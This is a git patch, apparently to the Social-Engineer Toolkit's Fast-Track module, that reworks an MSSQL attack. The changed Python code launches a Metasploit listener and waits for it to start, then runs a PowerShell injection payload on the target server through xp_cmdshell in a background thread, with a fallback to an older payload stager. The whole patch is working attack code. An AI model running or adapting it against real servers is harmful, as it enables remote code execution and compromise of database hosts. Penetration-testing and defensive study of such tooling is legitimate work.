From b5766a649cd4a15fac0e8e470fae73d73700b3ac Mon Sep 17 00:00:00 2001 From: TrustedSec Date: Fri, 30 May 2014 14:05:18 -0400 Subject: [PATCH] Major updates to mssql attack powershell injection --- readme/CHANGES | 5 +++++ src/fasttrack/mssql.py | 27 ++++++++++++++++----------- 2 files changed, 21 insertions(+), 11 deletions(-) diff --git a/readme/CHANGES b/readme/CHANGES index ca3d88da5..c899b06d0 100644 --- a/readme/CHANGES +++ b/readme/CHANGES @@ -3,6 +3,11 @@ version 6.0.1 ~~~~~~~~~~~~~~~~ * fixed menu system to remove sms spoofing (no longer supported) +* redesigned powershell injection to be much more efficient +* removed time delays in powershell injection, instead use pexpect expect() to wait for listener to start +* added option to fall back to old method if powershell injection fails (option menu) +* start msf listener first, wait for msf to launch, then trigger vulnerability +* threaded the powershell injection command through mssql ~~~~~~~~~~~~~~~~ version 6.0 diff --git a/src/fasttrack/mssql.py b/src/fasttrack/mssql.py index 98889e295..0f3195657 100644 --- a/src/fasttrack/mssql.py +++ b/src/fasttrack/mssql.py @@ -103,8 +103,12 @@ def deploy_hex2binary(ipaddr,port,username,password): match = re.search("parameter version", bundle) # if we have a match we have powershell installed if match: - print_status("Powershell was identified, targeting server through powershell injection.") - option = "1" + print_status("Powershell was detected on the remote system.") + option_ps = raw_input("Do you want to use powershell injection? [yes/no]:") + if option_ps == "" or option_ps == "y" or option_ps == "yes": + option = "1" + print_status("Powershell delivery selected. Boom!") + else: option = "2" # otherwise, fall back to the older version using debug conversion via hex else: print_status("Powershell not detected, attempting Windows debug method.") @@ -199,6 +203,9 @@ def deploy_hex2binary(ipaddr,port,username,password): except: import pexpect print_status("Starting the Metasploit listener...") child2 = pexpect.spawn("%s/msfconsole -r %s/reports/powershell/powershell.rc" % (msf_path,setdir)) + print_status("Waiting for the listener to start first before we continue forward...") + print_status("Be patient, Metaploit takes a little bit to start...") + child2.expect("Starting the payload handler", timeout=30000) # assign random_exe command to the powershell command random_exe = powershell_command @@ -265,25 +272,23 @@ def deploy_hex2binary(ipaddr,port,username,password): # thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified try: reload(thread) except: import thread + # execute the payload # we append more commands if option 1 is used - if option == "1": - print_status("Trigger the powershell injection payload.. ") - mssql.sql_query("exec master..xp_cmdshell '%s'" % (powershell_command)) + print_status("Triggering the powershell injection payload... ") + sql_command = ("exec master..xp_cmdshell '%s'" % (powershell_command)) + #mssql.sql_query("exec master..xp_cmdshell '%s'" % (powershell_command)) + thread.start_new_thread(mssql.sql_query, (sql_command,)) + # using the old method if option == "2": + print_status("Triggering payload stager...") sql_command = ("xp_cmdshell '%s'" % (random_exe)) # start thread of SQL command that executes payload thread.start_new_thread(mssql.sql_query, (sql_command,)) time.sleep(1) - # pause to let metasploit launch - real slow systems may need to adjust - # i need to rewrite this to do a child.expect on msf and wait until that happens - print_status("Pausing 15 seconds to let the system catch up...") - time.sleep(15) - print_status("Triggering payload stager...") - # if pexpect doesnt exit right then it freaks out if os.path.isfile(setdir + "/set.payload"): os.system("python ../../payloads/set_payloads/listener.py")